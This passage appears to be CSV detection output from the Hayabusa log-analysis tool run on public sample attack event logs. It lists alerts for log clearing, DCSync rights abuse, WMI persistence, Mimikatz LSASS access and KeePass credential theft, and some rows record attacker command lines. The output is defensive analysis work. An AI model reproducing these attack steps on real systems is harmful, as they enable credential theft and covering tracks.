+09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 